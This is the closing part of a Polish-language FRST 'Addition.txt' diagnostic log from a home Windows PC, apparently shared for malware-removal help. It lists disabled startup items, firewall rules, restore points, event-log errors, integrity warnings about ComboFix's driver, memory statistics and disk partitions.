(ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja wyłączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: AvgUi => MSCONFIG\startupreg: AVGUI.exe => MSCONFIG\startupreg: BrMfcWnd => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN MSCONFIG\startupreg: ControlCenter3 => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe /autorun MSCONFIG\startupreg: Discord => C:\Users\Mateusz\AppData\Local\Discord\app-0.0.296\Discord.exe MSCONFIG\startupreg: EADM => MSCONFIG\startupreg: FACEIT => "C:\Program Files\FACEIT\FACEIT.exe" MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{9386CE12-9B5B-4C8F-91B0-55AC97188C4E}] => (Allow) C:\Steam\Steam.exe FirewallRules: [{D90BFFF2-B6A8-4BD8-A01C-74042A7833A1}] => (Allow) C:\Steam\Steam.exe FirewallRules: [{DF6D2A48-D584-41DF-97B6-AB629FF86ECD}] => (Allow) C:\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{93CE63C4-0DA1-47EE-9950-7C9E25D4D41E}] => (Allow) C:\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [TCP Query User{E25B9C07-BFD3-4D76-9426-5EA451BCB619}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [UDP Query User{08A72D0D-0E8F-495A-8131-D64F1D45E54D}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [{03D0294A-EAA5-4143-A0F9-390487224CCC}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{22043CC1-AF6E-4B57-B2C1-8A178771B95E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{FD0A1D06-5124-451F-8016-818DD7B45492}] => (Allow) C:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{934FA660-F9FB-4C20-872E-43054A5F7DE9}] => (Allow) C:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{9D3E749B-1455-40C0-855E-BD8EC48E1808}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{BA984F3D-372A-4684-9EE2-751510D81D1E}] => (Allow) C:\Program Files\Opera\50.0.2762.58\opera.exe FirewallRules: [{33239B0B-9406-4F3E-9707-C308379DF343}] => (Allow) C:\Program Files\Opera\50.0.2762.67\opera.exe ==================== Punkty Przywracania systemu ========================= 07-02-2018 14:56:10 Zaplanowany punkt kontrolny 09-02-2018 16:08:59 Zainstalowany program DirectX 09-02-2018 16:09:34 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 09-02-2018 16:09:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 10-02-2018 22:32:13 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 10-02-2018 22:32:42 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 10-02-2018 22:32:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 10-02-2018 22:33:23 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 10-02-2018 22:33:34 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 10-02-2018 22:33:48 Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 10-02-2018 22:34:08 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 10-02-2018 22:34:19 Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 10-02-2018 22:34:45 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 10-02-2018 22:34:56 Zainstalowany program DirectX ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (02/11/2018 07:20:28 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/11/2018 07:12:57 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/11/2018 06:20:45 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/11/2018 11:52:29 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/10/2018 11:50:53 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/09/2018 02:38:27 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/08/2018 05:36:09 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/08/2018 03:03:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/07/2018 02:16:36 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (02/06/2018 03:44:48 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Dziennik System: ============= Error: (02/11/2018 07:18:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi AVG Service z powodu następującego błędu: System nie może odnaleźć określonej ścieżki. Error: (02/11/2018 07:18:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Live ID Sign-in Assistant z powodu następującego błędu: Potok został zakończony. Error: (02/11/2018 07:17:58 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (02/11/2018 07:17:58 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (02/11/2018 07:17:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Ochrona oprogramowania niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (02/11/2018 07:17:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Usługa udostępniania w sieci programu Windows Media Player niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (02/11/2018 07:17:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Windows Live ID Sign-in Assistant niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (02/11/2018 07:17:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Dynamic Application Loader Host Interface Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (02/11/2018 07:17:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Adobe Acrobat Update Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (02/11/2018 07:17:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Intel(R) Capability Licensing Service Interface niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. CodeIntegrity: =================================== Date: 2015-12-27 23:47:34.000 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-12-27 23:47:33.978 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz Procent pamięci w użyciu: 33% Całkowita pamięć fizyczna: 8135.85 MB Dostępna pamięć fizyczna: 5431.23 MB Całkowita pamięć wirtualna: 16269.88 MB Dostępna pamięć wirtualna: 13091.66 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:736.2 GB) (Free:632.76 GB) NTFS Drive d: () (Fixed) (Total:195.21 GB) (Free:195.12 GB) NTFS \\?\Volume{95529c44-a603-11e5-8fc0-806e6f6e6963}\ (Zastrzeżone przez system) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 88E97E0B) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=195.2 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=736.2 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================